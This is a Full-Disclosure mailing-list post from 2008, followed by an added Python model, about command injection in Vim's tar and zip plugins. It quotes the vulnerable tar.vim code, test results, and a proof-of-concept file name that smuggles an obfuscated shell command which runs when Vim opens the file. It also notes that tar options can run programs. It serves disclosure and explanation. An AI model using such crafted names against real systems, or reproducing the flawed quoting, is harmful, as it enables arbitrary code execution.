Full Disclosure: Re: Collection of Vulnerabilities in Fully Patched Vim 7.1

Re: Collection of Vulnerabilities in Fully Patched Vim 7.1

From: Jan Minář <rdancer_at_rdancer.org>
Date: Tue, 1 Jul 2008 20:36:29 +0100

On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar <Bram_at_moolenaar.net> wrote:
>
> Jan Minar wrote:
>
>> 1. Summary
>>
>> Product : Vim -- Vi IMproved
>> Version : Tested with 7.1.314 and 6.4
>> Impact : Arbitrary code execution
>> Wherefrom: Local and remote
>> Original : http://www.rdancer.org/vulnerablevim.html
>>
>> Improper quoting in some parts of Vim written in the Vim Script can lead to
>> arbitrary code execution upon opening a crafted file.

> Note that version 7.1.314, as reported in the Summary, does not have
> most of the reported problems. The problems in the plugins have also
> been fixed, this requires updating the runtime files. Information about
> that can be found at http://www.vim.org/runtime.php

I do apologize: as written in the advisory, the version I worked with
was 7.1.298. 7.1.314 was only partly vulnerable. FWIW, I have
updated the advisory at http://www.rdancer.org/vulnerablevim.html .

Thanks to Bram for all the good work.

7.2a.10 with updated runtime is still vulnerable to the zipplugin
attack, and an updated tarplugin attack:

-------------------------------------------
-------- Test results below ---------------
-------------------------------------------
filetype.vim
  strong : EXPLOIT FAILED
  weak : EXPLOIT FAILED
tarplugin : EXPLOIT FAILED
tarplugin.updated: VULNERABLE
zipplugin : VULNERABLE
xpm.vim
  xpm : EXPLOIT FAILED
  xpm2 : EXPLOIT FAILED
  remote : EXPLOIT FAILED
gzip_vim : EXPLOIT FAILED
netrw : EXPLOIT FAILED

The original tarplugin exploit now produces a string of telling error messages:

        /bin/bash: so%: command not found
        tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo: Cannot open: No such file or directory
        tar: Error is not recoverable: exiting now
        /bin/bash: retu: command not found
        /bin/bash: bar.tar|retu|'bar.tar: command not found

It's easy to see that it is still possible to execute arbitrary shell commands.

$VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10:

        136 if tarfile =~# '\.\(gz\|tgz\)$'
        137 " call Decho("1: exe silent r! gzip -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
       *138 exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - "
        139 elseif tarfile =~# '\.lrp'
        140 " call Decho("2: exe silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - ")
       *141 exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - "
        142 elseif tarfile =~# '\.bz2$'
        143 " call Decho("3: exe silent r! bzip2 -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
       *144 exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - "
        145 else
        146 " call Decho("4: exe silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile))
      **147 exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile)
        [...]
        444 fun s:Escape(name)
        445 " shellescape() was added by patch 7.0.111
        446 if exists("*shellescape")
        447 let qnameq= shellescape(a:name)
        448 else
        449 let qnameq= g:tar_shq . a:name . g:tar_shq
        450 endif
        451 return qnameq
        452 endfun

 (*) s:Escape() does not suffice, as it fails to escape ``%'' and friends.

(**) tar(1) allows arbitrary command execution via options ``--to-command'',
     and ``--use-compress-program''.

The updated tarplugin attack is rather simple:

        $ rm -rf ./*
        $ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 | xxd -r\`;'bar.tar"
        $ vim +:q ./foo*
        $ ls -l pwned
        -rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned

Cheers,
Jan Minar.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Received on Jul 01 2008
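The two footnotes in the post, (*) quoting that does not cover the characters Vim's :! expands, and (**) a file name reaching tar(1) where an option is accepted, modelled as an added Python example. This is not Vim's code and not part of the post: shellescape() and the :! expansion are reimplemented here as small models (only % expansion is modelled, with the second argument of shellescape() assumed to backslash !, % and #), tar_cmd is assumed to be "tar" and tar_browseoptions "tvf", and the file names are constructed for the demonstration. The check tokenizes the final command line the way a POSIX shell would and reports whether the file name survives as one operand.

```python
"""Model of the tarplugin quoting failure and of the two fixes implied by the post."""
import shlex

# Constructed sample names (not taken from the post's test environment).
BENIGN_NAME = "archive.tar"
PERCENT_NAME = "foo%;echo injected;'bar.tar"   # same shape as the post's foo% name
DASH_NAME = "-x.tar"                            # a name that starts with a dash


def shellescape(name: str, special: bool = False) -> str:
    """Model of Vim's shellescape(): single-quote the name, writing each ' as '\\''.
    special=True models shellescape({string}, 1): the characters that :! expands
    (!, %, #) additionally get a backslash, which :! strips again (assumption)."""
    quoted = "'" + name.replace("'", "'\\''") + "'"
    if special:
        for ch in "!%#":
            quoted = quoted.replace(ch, "\\" + ch)
    return quoted


def expand_bang(cmd: str, current_file: str) -> str:
    """Model of what :! does before the line reaches the shell: a bare % becomes the
    current file name, inserted verbatim with no quoting, and a backslash before
    !, % or # is removed. Only % is modelled; # and ! expansion are left out."""
    out, i = [], 0
    while i < len(cmd):
        c = cmd[i]
        if c == "\\" and i + 1 < len(cmd) and cmd[i + 1] in "!%#":
            out.append(cmd[i + 1])
            i += 2
        elif c == "%":
            out.append(current_file)
            i += 1
        else:
            out.append(c)
            i += 1
    return "".join(out)


def build_tar_browse(tarfile: str, special: bool, dashdash: bool) -> str:
    """Shape of line 147 of tar.vim: tar_cmd . " -" . tar_browseoptions . " " . Escape(tarfile).
    dashdash=True adds the "--" that lines 138/141/144 pass and line 147 lacks."""
    sep = " -- " if dashdash else " "
    return "tar -tvf" + sep + shellescape(tarfile, special)


def shell_words(cmd: str) -> list:
    """Tokenize like a POSIX shell: quotes are honoured, and the operators
    ; | & < > ( ) become separate tokens."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


def argv_seen_by_shell(tarfile: str, special: bool, dashdash: bool) -> list:
    """The words the shell sees after :! has expanded the command line."""
    return shell_words(expand_bang(build_tar_browse(tarfile, special, dashdash), tarfile))


def name_stays_one_operand(tarfile: str, special: bool, dashdash: bool) -> bool:
    """True when the shell ends up with exactly the intended words, i.e. the file
    name survives as a single operand and no separator or extra word leaked out."""
    expected = ["tar", "-tvf"] + (["--"] if dashdash else []) + [tarfile]
    return argv_seen_by_shell(tarfile, special, dashdash) == expected


def name_parsed_as_tar_option(tarfile: str, dashdash: bool) -> bool:
    """Footnote (**): without "--", a name beginning with "-" reaches tar as an
    option, and tar has options (--to-command, --use-compress-program) that run
    programs. Correct shell quoting does nothing about this; only "--" does."""
    return tarfile.startswith("-") and not dashdash


if __name__ == "__main__":
    for name in (BENIGN_NAME, PERCENT_NAME, DASH_NAME):
        for special in (False, True):
            print("%-30r special=%-5s -> %r" % (name, special,
                  argv_seen_by_shell(name, special, False)))
        print("%-30r treated as tar option without --: %s" % (name, name_parsed_as_tar_option(name, False)))
```

Running the block shows the PERCENT_NAME line splitting into a tar invocation followed by a second command when shellescape() is used without the special argument, and staying a single operand once % is backslashed before expansion; DASH_NAME is quoted correctly either way, which is why the "--" on lines 138/141/144 is a separate fix from the quoting one.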
